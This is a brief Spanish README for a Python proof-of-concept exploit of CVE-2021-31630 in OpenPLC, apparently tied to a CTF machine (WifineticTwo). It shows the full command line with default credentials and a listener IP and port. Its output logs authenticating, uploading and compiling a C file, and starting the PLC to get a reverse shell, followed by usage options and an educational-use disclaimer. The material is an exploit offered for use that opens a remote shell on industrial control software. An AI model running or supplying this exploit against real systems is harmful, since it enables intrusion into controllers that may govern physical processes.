
Exploit PoC para CVE-2021-31630 escrito en Python3 y usando reverse shell en C con modo no bloqueante.
Este exploit está basado en el exploit de Exploit-DB hecho por Fellipe Oliveira.
└─# python3 custom_exploit.py --url http://10.10.11.7:8080 --username openplc --password openplc --listenerip 10.10.16.4 --listenerport 8888
[*] Authenticated.
[*] C file uploaded. Waiting for compilation.
[*] Compiled, probably.
[*] Started PLC, you should get your reverse shell now.
[*] Stopped PLC.
python3 exploit.py --url <> --username <> --password <> --listenerip <> --listenerport <>
Opciones:
--url - URL del OpenPLC--username - nombre de usuario--password - contraseña--listenerip - dirección IP del listener--listenerport - puerto del listenerNOTA: Este exploit se creó como PoC; úselo solo con fines educativos o CTFs - https://flojboj.org/article/WifineticTwo